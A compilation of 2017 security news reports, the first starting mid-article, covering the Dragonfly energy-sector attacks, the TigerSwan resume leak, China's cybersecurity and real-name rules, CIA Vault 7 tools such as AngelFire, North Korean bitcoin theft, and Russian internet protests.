The group, known as Dragonfly, Crouching Yeti and Energetic Bear, has been active since at least 2010, but its activities were first detailed by security firms in 2014. Many of the threat actor’s attacks have focused on the energy sector in the United States and Europe.

Symantec says it has been monitoring a new campaign, which it has dubbed “Dragonfly 2.0,” since late 2015. The company has spotted victims of this operation in the United States, Switzerland and Turkey.

Symantec first warned about Dragonfly’s potential power grid sabotage capabilities in 2014. However, there has been no evidence that any of the group’s attacks resulted in power disruptions. The company now claims to have found evidence that may suggest the attackers have actually gained access to computers linked to operational systems.

The FBI and the DHS recently issued a joint report to warn manufacturing plants, nuclear power stations and other energy facilities in the U.S. of attacks that may have been launched by Dragonfly. However, the U.S. Department of Energy said only administrative and business networks were impacted, not systems controlling the energy infrastructure.

Symantec pointed out that Dragonfly’s initial campaigns appeared to focus on breaching the targeted organizations’ networks. However, in more recent attacks, the hackers seemed interested in learning how energy facilities operate and gaining access to operational systems. Experts warned that access to operational systems could be used in the future for more disruptive purposes, including to cause power outages.

However, the most “concerning evidence” presented by the security firm involves screen captures taken by the group’s malware. Some screen capture files analyzed by researchers had names containing the location and a description of the infected machine and the targeted organization’s name. Some of the machine descriptions included the string “cntrl,” which may mean that the compromised machine had access to control systems.

Experts previously linked Dragonfly to Russia. Symantec has not made any clear statements regarding the threat actor’s location, but it did say that some of the malware code was in Russian. However, researchers also reported finding strings written in French, which suggests that the attackers may be trying to throw investigators off track.

Symantec has linked the Dragonfly 2.0 attacks to earlier Dragonfly campaigns based on the use of watering holes, phishing emails, trojanized applications, and the same malware families, including the Heriplor backdoor that appears to be exclusively used by this group.


Details of U.S. 'Top Secret' Clearance Holders Leaked Online

5.9.2017 securityweek BigBrothers
The personal details of thousands of individuals who submitted job applications to an international security firm were exposed online due to an unprotected storage server set up by a recruiting services provider.

Chris Vickery of cyber resilience firm UpGuard discovered on July 20 an Amazon Web Services (AWS) S3 storage bucket that could be accessed by anyone over the Internet. The server stored more than 9,400 documents, mostly representing resumes of people who had applied for a job at TigerSwan, an international security and global stability firm.

The documents included information such as names, physical addresses, email addresses, phone numbers, driver’s license numbers, passport numbers and at least partial social security numbers (SSNs). In many cases, the resumes also provided information on security clearances from U.S. government agencies, including the Department of Defense, the Secret Service, and the Department of Homeland Security. Nearly 300 of the exposed resumes listed the applicant as having a “Top Secret/Sensitive Compartmented Information” clearance.

According to UpGuard, a majority of the individuals whose information was compromised were military veterans, but hundreds of resumes belonged to law enforcement officers who had sought a job at TigerSwan, a company recently described by The Intercept as a “shadowy international mercenary and security firm.”

The list of affected people also includes a former United Nations worker, an active Secret Service agent, a parliamentary security officer from Eastern Europe, and a logistical expert from Central Africa.

UpGuard also highlighted that some of the individuals whose details have been leaked are Iraqi and Afghan nationals who worked with U.S. and Coalition forces. Experts believe the leak could pose a serious risk to these individuals if someone other than UpGuard found the unprotected storage server.

UpGuard informed TigerSwan about the leak on July 21, but the files were left unprotected until August 24. In a statement published on its website, TigerSwan clarified that the files were exposed by TalentPen, a recruiting firm whose services it had used between 2008 and February 2017.

TigerSwan said it initially believed that UpGuard’s warnings via email and phone were part of a phishing attack, especially since the notifications came shortly after the WannaCry and NotPetya malware outbreaks and the URLs provided by the cybersecurity firm were not linked to TigerSwan. The company realized that UpGuard’s claims were legitimate only on August 31, when it was contacted by reporters, but by that time the storage server had been secured by TalentPen.

TigerSwan says it’s in the process of contacting affected individuals. The company has advised people who submitted a resume on its website between 2008 and 2017 to call a hotline (919-274-9717) to find out if they are impacted by the incident.

In order to help prevent these types of leaks, Amazon recently announced the launch of Macie, a new security service designed to help AWS users protect sensitive data.


Thousands resumes of US military and intel contractors left unsecured on an Amazon server
4.9.2017 securityaffairs BigBrothers

Experts discovered thousands of files containing personal data on former US military, intelligence, and government workers exposed online for months.
Researchers from cybersecurity company UpGuard have discovered thousands of files containing personal data on former US military, intelligence, and government workers have allegedly been exposed online for months.

The data breach has been initially attributed to security firm TigerSwan, but the company confirmed that it outsourced the selection of applicants to the recruitment firm TalentPen vendor hired to process new job applicants. The data include addresses, phone numbers, and private email accounts.

According to Gizmodo.com, some 9,400 sensitive files were accessible to anyone on a misconfigured Amazon cloud server in a folder called “resumes.”

Some of the profiles exposed have classified or Top Secret security clearances, they applied for work at the notorious security firm TigerSwan.

The exposed documents included CVs of thousands of US citizens, many of them might have worked with the US military and US intelligence agencies (i.e. Central Intelligence Agency, the National Security Agency, US Secret Service).

“The UpGuard Cyber Risk Team can now disclose that a publicly accessible cloud-based data repository of resumes and applications for employment submitted for positions with TigerSwan, a North Carolina-based private security firm, were exposed to the public internet, revealing the sensitive personal details of thousands of job applicants, including hundreds claiming “Top Secret” US government security clearances.” states a blog post published by UpGuard. “TigerSwan has recently told UpGuard that the resumes were left unsecured by a recruiting vendor that TigerSwan terminated in February 2017. If that vendor was responsible for storing the resumes on an unsecured cloud repository, the incident again underscores the importance of qualifying the security practices of vendors who are handling sensitive information.”

The impact of the data leak could be severe, some applicants were involved in highly-classified US military operations.

According to the firm UpGuard, at least one of the applicants claimed he was charged with the transportation of nuclear activation codes and weapons components.

“One applicant referenced his employment as a “warden advisor” at the infamous Abu Ghraib black site near Baghdad, where prisoners are known to have been tortured. The applicant described his job as “establishing safe and secure correctional facilities for the humane care, custody, and treatment of persons incarcerated in the Iraqi corrections system.” reported Gizmodo.com

“Another applicant reportedly stated that he was involved in “enhancing evidence” against Iraqi insurgents during the war. Others, who provided their home addresses, as well as personal email accounts and phone numbers, were employed and may be currently employed by US spy agencies for work on Top Secret surveillance and intelligence-gathering operations.”for work on Top Secret surveillance and intelligence-gathering operations.”

US military

The private security firm TigerSwan confirmed that its systems were not hacked.
“At no time was there ever a data breach of any TigerSwan server,”TigerSwan said.“All resume files in TigerSwan’s possession are secure. We take seriously the failure of TalentPen to ensure the security of this information and regret any inconvenience or exposure our former recruiting vendor may have caused these applicants.”

The exposed S3 bucket was discovered by the popular data breach hunter Chris Vickery, he confirmed that the data was discovered in July and unfortunately they were removed from the cloud server only at the end of August.

On August, Vickery discovered more than 1.8 million voter records belonging to Americans have been accidentally leaked online by a US voting machine supplier for dozens of US states.

In June, Vickery discovered that a top defense contractor left tens of thousands sensitive Pentagon documents on Amazon Server Without any protection in places.

Chris Vickery discovered many other clamorous cases of open database exposed on the Internet. In July he discovered data belonging to 14 million U.S.-based Verizon customers that have been exposed on an unprotected AWS Server by a partner of the telecommunications company. In December 2015 the security expert discovered 191 million records belonging to US voters online, on April 2016 he also discovered a 132 GB MongoDB database open online and containing 93.4 million Mexican voter records.

In March 2016, Chris Vickery has discovered online the database of the Kinoptic iOS app, which was abandoned by developers, with details of over 198,000 users.

In January 2017, the expert discovered online an open Rsync server hosting the personal details for at least 200,000 IndyCar racing fans.

In March, he announced a 1.37 billion records data leak, in June 2017 Vickery revealed the DRA firm left 1.1 TB of data unsecured on an Amazon S3, 198 million US voter records exposed.


Chinese cyber security law will allow China to use zero-day knowledge for its intelligence
4.9.2017 securityaffairs BigBrothers

According to the Chinese Cyber Security law, the information obtained by the CNNVD could be used in intelligence operations.
The new Chinese cyber security law will allow the Government to analyze the source code and any intellectual property of foreign tech companies working in the country.

The Chinese cyber security law was focused on the protection of Chinese users’ data, but reading with further attention the bill it is easy to imagine the devastating effects on foreign companies and their technologies.

According to the threat intelligence firm Recorded Future, the analysis will be assigned to the China Information Technology Evaluation Center (CNITSEC) that operates under the office in the Ministry of State Security (MSS).

The fear of Recorded Future experts is that the information obtained by the analysis conducted by the CNITSEC could be used to discover vulnerabilities in the code used by tech firms and exploit them in intelligence operations.

“According to academic research published in China and Cybersecurity: Espionage, Strategy, and Politics in the Digital Domain, CNITSEC is run by the MSS and houses much of the intelligence service’s technical cyber expertise.” reads a blog post published by Recorded Future. “CNITSEC is used by the MSS to “conduct vulnerability testing and software reliability assessments.” Per a 2009 U.S. State Department cable, it is believed China may also use vulnerabilities derived from CNITSEC’s activities in intelligence operations. CNITSEC’s Director, Wu Shizhong, even self-identifies as MSS, including for his work as a deputy head of China’s National Information Security Standards Committee as recently as January 2016.”

Chinese Cyber Security law

CNITSEC also runs the China National Vulnerability Database of Information Security (CNNVD), which is the nation’s information security assessment center.

The CNNVD is similar to the US National Institute of Standards and Technology (NIST) NVD, it is tasked with the construction, operation, and maintenance of the national information security vulnerability data management platform.

Researchers believe that the structure will not operate to publicly identify, report, and create security patches for software vulnerabilities.

“This means that the MSS is using the broad language and new authorities in China’s cybersecurity law to possibly gain access to vulnerabilities in foreign technologies that they could then exploit in their own intelligence operations.” states Recorded Future.”The MSS has a voice in which vulnerabilities are reported via the CNNVD, because they run it; they could also easily identify and hide from the public a critical weakness in software or hardware, then turn around and use it in their own operations.”

The tech companies are blackmailed by the Chinese government, they will have to share information on their proprietary technology and IP to offer their services and solutions in one of the most important markets.

Recorded Future has published an interesting paper that is focused on the impact of the Chinese cyber security law on firms that intend to do business in the country, the analysis also provides practical advice to the firms.

“Recorded Future’s research has focused on the broad powers the cybersecurity law gives to the China Information Technology Evaluation Center (CNITSEC), an office in China’s premier foreign intelligence service, the Ministry of State Security (MSS). The law gives “network information departments,” including CNITSEC, the power to conduct “national security reviews” (see Article 35) of technology that foreign companies want to use or sell in the Chinese market.” states the paper published by RecordedFuture.

“The MSS’s integration into the information security architecture of China via CNITSEC will (1) possibly allow it to identify vulnerabilities in foreign technologies that China could then exploit in their own intelligence operations, and (2) create an impossible choice for foreign companies between giving their proprietary technology or intellectual property to the MSS and being cut out of the mainland Chinese information technology market, which is projected to reach $242 billion in 2018.”

Recorded Future defined Chinese Cyber security Law as broad and language is vague.

“It is important for companies to note the imprecision and breadth of the CSL as well as the 2015 National Security Law, because both contain vague language that can be invoked by Chinese authorities to compel national security reviews, data sharing with government authorities, and even inspections into proprietary technology or intellectual property.” continues the analysis.

The experts believe that the poorest-defined sections of the law was “Chapter Three: Network Operations Security.” The chapter includes 18 articles which define the “network security protection” responsibilities of “network operators” and additional legal responsibilities for companies that operate “critical information infrastructure.”

The impact on foreign businesses is already severe considering the measure adopted by tech giants like IBM and Apple.

IBM has agreed to build servers for Larkspur to offer services to the Chinese banking industry, meanwhile, Apple removed iOS VPN apps from Chinese App Store in compliance with censorship law.

Back to the discussion about the MSS powers, the fact that it could discover and operationalize vulnerabilities in proprietary products or services, implies the following risks for companies that must be carefully condidered.

Risk to a company’s own machines or networks.
Risk to a company’s product or service.
Derivative risk to customers, clients, or users around the world.


CIA's "AngelFire" Modifies Windows' Boot Sector to Load Malware

31.8.2017 securityweek BigBrothers
Wikileaks on Thursday published documents detailing AngelFire, a tool allegedly used by the U.S. Central Intelligence Agency (CIA) to load and execute implants on Windows-based systems.

Similar to other “Vault7” tools that Wikileaks unveiled over the past several months, such as Grasshopper and AfterMidnight, AngelFire is a persistent framework targeting computers running Windows XP and Windows 7.

According to the published documents, the framework consists of five components: Solartime, Wolfcreek, Keystone (previously called MagicWand), BadMFS, and the Windows Transitory File system.

Solartime was designed to modify the partition boot sector so as to load the Wolfcreek implant when Windows loads boot time device drivers. Wolfcreek is a self-loading driver that can load additional drivers and user-mode applications after execution. By loading additional implants, memory leaks that could be detected on infected machines are created.

Part of the Wolfcreek implant, Keystone is responsible for starting malicious user applications. The leaked documents also reveal that the implants are loaded directly into memory and they never touch the file system. The created processes are named svchost.exe and all of their properties are consistent with a real instance of svchost.exe, including image path and parent process.

BadMFS is a covert file system created at the end of the active partition and used to store (both encrypted and obfuscated) all drivers and implants launched by Wolfcreek. Some versions of the library can be detected because reference to it is stored in a file named "zf".

The Windows Transitory File system was meant as a new method of installing AngelFire, allowing an operator to create transitory files (instead of laying independent components on disk) for actions such as installation, adding files to, or removing files from AngelFire. These transitory files are added to the 'UserInstallApp'.

According to the AngelFire user guide, the tool features a small footprint and comes with two installer versions, namely an executable and a fire-and-collect .dll installer. The implant framework is compatible with the 32-bit Windows XP, and Windows 7, and 64-bit Windows Server 2008 R2 and Windows 7.

The tool is also plagued with a variety of issues, the leaked documents say, including the lack of support for .dll persistence on Windows XP, an imperfect heuristic algorithm, incorrectly configured SEH environment during driver load, or the inability to dynamically determine the path of svchost.exe, among others.


AngelFire: CIA Malware Infects System Boot Sector to Hack Windows PCs

31.8.2017 thehackernews BigBrothers

A team of hackers at the CIA, the Central Intelligence Agency, allegedly used a Windows hacking tool against its targets to gain persistent remote access.
As part of its Vault 7 leaks, WikiLeaks today revealed details about a new implant developed by the CIA, dubbed AngelFire, to target computers running Windows operating system.
AngelFire framework implants a persistent backdoor on the target Windows computers by modifying their partition boot sector.
AngelFire framework consists five following components:
1. Solartime — it modifies the partition boot sector to load and execute the Wolfcreek (kernel code) every time the system boots up.
2. Wolfcreek — a self-loading driver (kernel code that Solartime executes) that loads other drivers and user-mode applications
3. Keystone — a component that utilizes DLL injection technique to execute the malicious user applications directly into system memory without dropping them into the file system.
4. BadMFS — a covert file system that attempts to install itself in non-partitioned space available on the targeted computer and stores all drivers and implants that Wolfcreek starts.
5. Windows Transitory File system — a new method of installing AngelFire, which allows the CIA operator to create transitory files for specific tasks like adding and removing files to AngelFire, rather than laying independent components on disk.
According to a user manual leaked by WikiLeaks, AngelFire requires administrative privileges on a target computer for successful installation.
The 32-bit version of implant works against Windows XP and Windows 7, while the 64-bit implant can target Server 2008 R2, Windows 7.
Previous Vault 7 CIA Leaks
Last week, WikiLeaks published another CIA project, dubbed ExpressLane, which detailed about the spying software that the CIA agents used to spy on their intelligence partners around the world, including FBI, DHS and the NSA.
Since March, WikiLeaks has published 22 batches of "Vault 7" series, which includes the latest and last week leaks, along with the following batches:
CouchPotato — A CIA project that revealed its ability to spy on video streams remotely in real-time.
Dumbo — A CIA project that disclosed its ability to hijack and manipulate webcams and microphones to corrupt or delete recordings.
Imperial — A CIA project that revealed details of 3 CIA-developed hacking tools and implants designed to target computers running Apple Mac OS X and different flavours of Linux OS.
UCL/Raytheon — An alleged CIA contractor that analysed in-the-wild advanced malware and submitted at least five reports to the agency for help it develops its malware.
Highrise — An alleged CIA project that allowed the US agency to stealthy collect and forward stolen data from compromised smartphones to its server via SMS messages.
BothanSpy and Gyrfalcon — Two alleged CIA implants that allowed the spy agency to intercept and exfiltrate SSH credentials from targeted Windows and Linux computers using different attack vectors.
OutlawCountry — An alleged CIA project that allowed the agency to hack and remotely spy on computers running Linux operating systems.
ELSA — Alleged CIA malware that tracks geo-location of targeted laptops and computers running the Microsoft Windows OS.
Brutal Kangaroo — A tool suite for Microsoft Windows OS used by the CIA agents to target closed networks or air-gap computers within an organisation or enterprise without requiring any direct access.
Cherry Blossom — A framework employed by the agency to monitor the Internet activity of the targeted systems by exploiting flaws in Wi-Fi devices.
Pandemic — A CIA's project that allowed the spying agency to turn Windows file servers into covert attack machines that can silently infect other PCs of interest inside the same network.
Athena — A spyware framework that the agency designed to take full control over the infected Windows systems remotely and works against every version of Windows OS–from Windows XP to Windows 10.
AfterMidnight and Assassin — 2 alleged CIA malware frameworks for the Microsoft Windows platform that's meant to monitor and report back actions on the infected remote host PC and execute malicious actions.
Archimedes — Man-in-the-middle (MitM) attack tool allegedly developed by the agency to target computers inside a Local Area Network (LAN).
Scribbles — Software allegedly designed to embed 'web beacons' into confidential documents, allowing the CIA agents to track insiders and whistleblowers.
Grasshopper — A framework which allowed the spying agency to easily create custom malware for breaking into Microsoft's Windows OS and bypassing antivirus protection.
Marble — Source code of a secret anti-forensic framework used by the agency to hide the actual source of its malware.
Dark Matter — Hacking exploits the spying agency designed to target iPhones and Macs.
Weeping Angel — Spying tool used by the CIA agents to infiltrate smart TV's, transforming them into covert microphones.
Year Zero — CIA hacking exploits for popular hardware and software.


North Korea Accused of Stealing Bitcoin to Bolster Finances

30.8.2017 securityweek BigBrothers
North Korea (DPRK) appears to be targeting bitcoin (both users and exchanges) as a means to counter the increasing effect of international sanctions. Earlier this month the UN Security Council unanimously imposed new sanctions targeting the country's primary exports. Dwindling coal exports to China will be particularly severe, and DPRK's export revenues will likely be slashed by $1 billion.

Recent cyber-attacks against South Korean bitcoin exchanges are now being blamed on North Korea. Radio Free Asia (RFA) -- a non-profit East Asian News Agency -- has reported that DPRK has already launched three cyber-attacks on bitcoin exchanges in South Korea, and one in Europe. Details, including timings, are sparse -- so it is quite possible that the July hack of a Bithumb employee is included, and here attributed to North Korea.

North Korea FlagThis basic premise that North Korea is targeting bitcoins is reiterated in a report from the United Press International news agency. It says, "The CWIC Cyber Warfare Research Center in South Korea stated a domestic exchange for bitcoin, the worldwide cryptocurrency and digital payment system, has been the target of an attempted hacking... CWIC's Simon Choi said it is 'not only one or two exchanges where attack attempts have been made'."

The precise status of the Cyber Warfare Research Center in South Korea is not explained. Nevertheless, Choi is credited with claiming that phishing emails have been targeting not just bitcoin exchanges, but that "Startups that use blockchain, financial technology sector companies as well as others, may have been the target." The report adds, "According to CWIC, the malicious code attached to the emails was identical to viruses of North Korean origin."

Despite the lack of detail, these two reports have been elaborated by bitcoin news publications. One leads with "State-sponsored North Korean hackers have been accused of targeting South Korean bitcoin exchanges with cyberattacks and hacking attempts by a South Korean official."

Frankly, it is not at all clear how much veracity can be attached to the reports -- there is no detail, no proof, no timings, and no definition of the status of CWIC (which is variously described as the Cyber Warfare Research Center and the Cyber Warfare Intelligence Center). However, the idea is certainly supported by motive and means: North Korea has both. In stealing bitcoins, the beleaguered nation can simultaneously bolster its finances and obtain 'foreign currency' that cannot be blocked by western governments. Merely surmising that this is now at the least semi-official policy of the cyber army of North Korea may not be far from the truth.

If cyber-attackers are spear-phishing bitcoin users/holders, then it presupposes knowledge of the targets' email addresses. Choi has apparently suggested that "North Korea has some how gained details about all those individuals who regularly do trading with BTC exchanges." However, this could easily be explained if it was indeed North Korea behind the July Bithumb breach. At this time, roughly 31,000 users – representing 3 percent of the company’s total number of customers – had their email and phone information stolen.

In a blog post, Ross Rustici, Cybereason's senior director of intelligence services suggests that any such North Korean hacking policy will have good, bad, and ugly ramifications.

The good, he suggests, is "it means that the DPRK threat, in totality, will be degraded. By focusing on currency generation, groups that would otherwise be gearing up for network attacks or traditional espionage will be diverted to filling out the bottom line."

The bad, he wrote is that, "Banking, financial institutions, and currency exchanges are likely to see a steady increase in malicious and sophisticated intrusion attempts." These attacks are likely to focus on institutions in South Korea, America and Japan to serve the dual purpose of political retaliation and revenue generation; but would likely also apply wherever network security is largely weak."

The ugly, however, is particularly ugly. "Given current tensions and the potential desire to retaliate for perceived assaults on the regime," comments Rustici, "the DPRK has the latent capacity to conduct a heist and destroy the network on the way out. The likelihood of this combination happening is low, but it is not zero."

At this point, it would be worth considering WannaCry, largely attributed to North Korea. The very poor process of ransom collection built into the original WannaCry led some researchers to conclude its real purpose was destructive: ransomware without decryption is effectively a cyberweapon wiper. NotPetya was more clearly a disguised cyberweapon, although in this instance more likely an attack by Russia against the Ukraine.


China Enforces Real-Name Policy to Regulate Online Comments

29.8.2017 thehackernews BigBrothers

If you reside in China, your Internet life within the borders will soon be even more challenging.
Last Friday, China's top Internet regulator announced a new set of rules that would force citizens to post comments using their real-world identities on Internet forums and other web platforms.
Yes, you heard that right. Anonymity is about to die in the country.
The Cyberspace Administration of China (CAC) will start officially enforcing the new rules starting from October 1, 2017, requiring websites operators and service providers of online forums to request and verify real names and other personal information from users when they register and must immediately report illegal content to the authorities.
According to the CAC, the following content would be considered unlawful and forbidden from being published online:
Opposing the basic principles as defined in the Constitution
Endangering national security
Damaging nation's honor and interests
Inciting national hatred, ethnic discrimination and undermining national unity
Undermining nation's religious policies and promoting cults
Spreading rumours, disrupting social order and destroying social stability
Spreading pornography, gambling, violence, murder, terror or abetting a crime
Insulting or slandering others and infringing upon others
Any other content that is prohibited by laws and administrative regulations
Well, the list covers almost everything.
While China has already enforced "real-name registration" rules on the leading online platforms like WeChat and Weibo for a few years, the latest regulations would cover the remaining parts of the online world, including online communities and discussion forums.
The new rules will be imposed on websites, smartphone apps, interactive communications platforms, and any communication platform that features news or functions to "mobilise society." In fact, news sites even have to moderate comments before publishing.
These new regulations follow China's 14-month-long crackdown on VPN (Virtual Private Networks), which requires VPN service providers in the country to obtain prior government approval, making most VPN vendors in the country of 730 million Internet users illegal.
Late last month, Apple also removed some VPN apps, including ExpressVPN and Star VPN, from its official Chinese app store to comply with the government crackdown that will remain in place until March 31, 2018.


India and Pakistan hit by state-sponsored cyber espionage campaign
29.8.2017 securityaffairs BigBrothers

The security firm Symantec has discovered another cyber espionage campaign against India and Pakistan which is likely to be state-sponsored.
Security experts at Symantec have uncovered a sustained cyber spying campaign against Indian and Pakistani entities involved in regional security issues.

The nature of the targets and the threat actors’ techniques suggest it is a state-sponsored campaign likely powered by several groups of hackers.

“The campaign appeared to be the work of several groups, but tactics and techniques used suggest that the groups were operating with “similar goals or under the same sponsor”, probably a nation state, according to the threat report, which was reviewed by Reuters. It did not name a state.” reported the Reuters.

According to a threat intelligence report, Symantec sent to clients in July, the cyber espionage campaign dated back to October 2016.

The experts speculate the involvement of several groups that shared TTPs operating with “similar goals or under the same sponsor.”

The cyber espionage campaign was uncovered while tensions in the region are raising.

India’s military is intensifying operational readiness along the border with China following a face-off in Bhutan near their disputed frontier, at the same time tensions are rising between India and Pakistan over the disputed Kashmir region.

The threat actors appear focused on governments and militaries with operations in South Asia and interests in regional security issues. Attackers leverage the “Ehdoor” backdoor to gain control over infected machines.
Backdoor.Ehdoor is a Trojan horse first spotted in September 2016, it was initially used to target government, military and military-affiliated entities in the Middle East and elsewhere.
The Ehdoor backdoor opens a back door, steals information, and downloads potentially malicious files onto the compromised computer.
“There was a similar campaign that targeted Qatar using programs called Spynote and Revokery,” said a security expert, who requested anonymity. “They were backdoors just like Ehdoor, which is a targeted effort for South Asia.”

According to the Symantec report, attackers used decoy documents related to security issues in South Asia in to deliver the malware. The attackers was also being used to target Android devices.

“The documents included reports from Reuters, Zee News, and the Hindu, and were related to military issues, Kashmir, and an Indian secessionist movement.” states the Reuters.

“The malware allows spies to upload and download files, carry out processes, log keystrokes, identify the target’s location, steal personal data, and take screenshots, Symantec said, adding that the malware was also being used to target Android devices.”

India cyber espionage

Gulshan Rai, the director general of CERT-In, hasn’t commented the cyber espionage campaign, but he said: “We took prompt action when we discovered a backdoor last October after a group in Singapore alerted us.”

According to malware researchers at Symantec, the backdoor was continuously improved over the time to implement “additional capabilities” for spying operations.

“A senior official with Pakistan’s Federal Investigation Agency said it had not received any reports of malware incidents from government information technology departments. He asked not to be named due to the sensitivity of the matter.” continues the Reuters.

“A spokesman for FireEye, another cybersecurity company, said that based on an initial review of the malware, it had concluded that an internet protocol address in Pakistan had submitted the malware to a testing service. The spokesman requested anonymity, citing company policy.”


U.S. Government Cybersecurity Ranks 16th Out of 18 Industry Sectors

28.8.2017 securityweek BigBrothers
The U.S. state and federal government's cybersecurity standing is ranked 16th of 18 industry sectors in a new report. This is a very small improvement on last year's comparable position, which was 18th out of 18; but it still paints a grim picture of public sector readiness to fight cybercrime and cyber espionage.

The 2017 U.S. State and Federal Government Cybersecurity report (PDF) was just published by SecurityScorecard, a firm that seeks to help business manage third- and fourth-party risk (the supply chain). It does this by collecting and analyzing subject data through its own data engine, ThreatMarket -- which uses 10 categories such as web applications, network security, DNS health, patching cadence and what it calls 'hacker chatter'.

SecurityScorecard is based in New York. It was founded in 2013, and raised $12.5 in Series A funding led by Sequoia Capital in 2015. Its stated mission is "to empower every organization with collaborative security intelligence."

For this report, SecurityScorecard analyzed more than 500 state and local government agencies, and compared the results, as a group, to 17 other industry sectors. Although there has been a slight improvement over last year's results, government organizations are particularly weak in network security (13th), application security (11th), leaked credentials (12th), patching cadence (16th), endpoint security (17th), IP reputation (16th), and hacker chatter (18th).

Government is, however, performing well in three of the 10 categories: DNS health (2nd), social engineering (3rd), and cubit score (2nd). The cubit score is a measure of exposed administrative portals and subdomains. Nevertheless, the only two sectors performing worse than government overall are Telecommunications and Education. Surprisingly, perhaps, regulation doesn't put the heavily regulated industries at the top of the chart: transportation, healthcare and energy are all among the poorest performing industries, while financial services only ranks at fifth position.

Within the 500 government offices analyzed, the Federal Reserve, the Secret Service and the IRS are all -- reassuringly -- within the top ten performing agencies. In fact, among the larger organizations, the top four agencies are the IRS, the Congressional Budget Office, the Federal Trade Commission and the Defense Logistics Agency.

The report does not specify the poorest performing agencies -- in fact, the report rarely specifies individual agencies, more usually saying only 'federal agency', or 'county (or city) in [state]'.

Commenting on the report, Sam Kassoumeh, COO and co-founder at SecurityScorecard, said, "On an almost daily basis, the institutions that underpin the nation's election system, military, finances, emergency response, transportation, and many more, are under constant attack from nation-states, criminal organizations, and hacktivists. Government agencies provide mission-critical services that, until they are compromised, most people take for granted. This report is designed to educate elected officials, agency leadership, as well as government security professionals about the state of security in the government sector."

In reality, however, reports like this can only provide indicators of overall security -- this one relies on the interpretation of external factors without being able to analyze the internal security. For example, in the leaked credentials category, Government ranks 12th out of 18. "SecurityScorecard," says the report, "maps the information [from password dumps] back to the companies who own the data or associated email accounts that are connected to the leaked information. By doing so, SecurityScorecard is able to assess the likelihood that an organization will succumb to a security incident due to the leaked information."

But it doesn't know the internal processes and controls of the organization concerned -- whether, for example, all passwords have been changed since the leak, or whether new multi-factor and behavioral authentication controls have been introduced.

Similarly, an organization's susceptibility to social engineering (here government scores well at 3rd out of the 18 sectors) is measured by monitoring social media practices to see how easy it would be to build an employee profile that can be phished or spear-phished. But this doesn't measure the existence or effectiveness of the organization's internal awareness training, nor any anti-spam or anti-phishing controls. A more accurate way to measure social engineering susceptibility would be to measure employees' phishing clicks through simulated phishing attacks -- which SecurityScorecard cannot do.

This doesn't mean that the report has no value. It does -- but it should, perhaps, be taken with a pinch of salt. "I personally like this type of reporting and feel we need more such metrics," comments Martin Zinaich, the information security officer at the City of Tampa. "However, the efficacy of such is mixed."

He gives the example of a local TV station running the Qualys SSL scanner against a number of local governments. "One entity scored an F," he said. "So, the TV station ran a number of stories about them failing -- which of course caused political havoc."

The reality was different. "That failing score was based on support for an outdated cipher. Now SSL ciphers negotiate to the highest level both sides support. To have a material breach someone would have had to have an outdated browser and then a third party would have to perform a man-in-the-middle attack on that outdated connection. The reward of which would have probably been seeing a water bill." The danger comes in drawing black and white conclusions from insufficient data.

Zinaich believes it is all part of what he calls the "Security Theatre". At one level, the SecurityScorecard report is a sales pitch marketing the SecurityScorecard third-party risk service. But on another level, it also provides some genuine indicators of security posture that are valid provided they are treated as indicators rather than statements of fact. It is worth noting, for example, that rival third-party risk management company, BitSight, rated the federal government as "the second highest performing sector" out of six sectors in September 2015.


China Demands Internet Platforms Verify Users' True Identity

28.8.2017 securityweek BigBrothers
China has ordered the country's internet platforms to verify users' true identity before letting them post online content, the latest step by authorities to tighten policing of the web.

All social networking sites and discussion forums must "check the real identity" of their users before they can post online content and comments, under new regulations published Friday by the Cyberspace Administration of China.

The platforms will also have to strengthen their oversight over all published information, deleting all illegal content while also alerting authorities to the postings.

The new guidelines take effect October 1.

China already had laws requiring companies to verify a user's identity but it was applied in a fragmented and incomplete way.

But forcing online posters to identify themselves -- which will probably require scanning a government-issued ID as proof of identity -- makes it much more difficult to post online anonymously.

China already tightly controls the internet aggressively blocking sites of which it disapproves and curbing politically sensitive online commentary, such as on criticism of the government.

The new regulation was adopted as part of a cybersecurity law that took effect in June, which bans internet users from publishing a wide variety of information.

That covers anything that damages "national honour", "disturbs economic or social order" or is aimed at "overthrowing the socialist system".

The law also requires online platforms to get a license to post news reports or commentary about the government, economy, military, foreign affairs, and social issues.

Since 2013, China has imposed prison sentences on users whose messages are deemed "defamatory".

But new restrictive measures have multiplied in recent months, ahead of the Communist Party's autumn congress during which President Xi Jinping is expected to be re-elected.

China has enforced new rules on what is permissible content, with content such as celebrity gossip blogs and online video streaming sites hit by the regulations.

The authorities have also stepped up efforts to clamp down on virtual private networks (VPN), software that allows people to circumvent the Great Firewall.


Hundreds of Russians Protest Tighter Internet Controls

28.8.2017 securityweek BigBrothers

About 1,000 Russians braved pouring rain in Moscow on Saturday to demonstrate against the government's moves to tighten controls on internet use, with police arresting about a dozen protesters.

Shouting slogans such as "Russia will be free" and "Russia without censorship", the protesters were escorted by several police officers, in a march authorised by local authorities.

Several were also marching in support of Khudoberdi Nurmatov, a reporter for the Russian opposition newspaper Novaya Gazeta, who faces deportation back to Uzbekistan over allegedly violating immigration laws.

Some of those were arrested, according to OVD-Info, a rights group that monitors detentions of activists, while an AFP photographer saw two protesters carrying rainbow flags detained.

In July, Russia's parliament voted to outlaw web tools that let internet users sidestep official bans of certain websites.

It allows telecommunications watchdog Roskomnadzor to compile a list of so-called anonymiser services and prohibit any that fail to respect the bans, while also requiring users of online messaging services to identify themselves with a telephone number.

"Innovation and technology will win! We will defend our freedoms!" one protester said, according to a broadcast of the march on YouTube.

Russia's opposition groups rely heavily on the internet to make up for their lack of access to the mainstream media.

But the Russian authorities have been clamping down on such online services, citing security concerns.

In June, Russian officials threatened to ban the Telegram messaging app after the FSB security service said it had been used by the attackers responsible for the deadly Saint Petersburg metro bombing in April.


WikiLeaks: CIA Secretly Collected Data From Liaison Services

25.8.2017 securityweek BigBrothers
WikiLeaks has published another round of Vault 7 documents, this time describing a tool allegedly used by the U.S. Central Intelligence Agency (CIA) to secretly collect biometric data from the agency’s liaison services.

The leaked documents, marked as “secret,” appear to reveal that the CIA’s Office of Technical Services (OTS) and Identity Intelligence Center (I2C), both part of the agency’s Directorate of Science and Technology, have provided liaison services with a system that collects biometric information.

According to WikiLeaks, these liaison services include other U.S. government agencies, such as the National Security Agency (NSA), the Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI).

In order to ensure that liaison services share the collected biometric data, the CIA has developed a tool called ExpressLane, which secretly copies the data collected by the biometric software and disables this software if continued access is not provided to the agency.

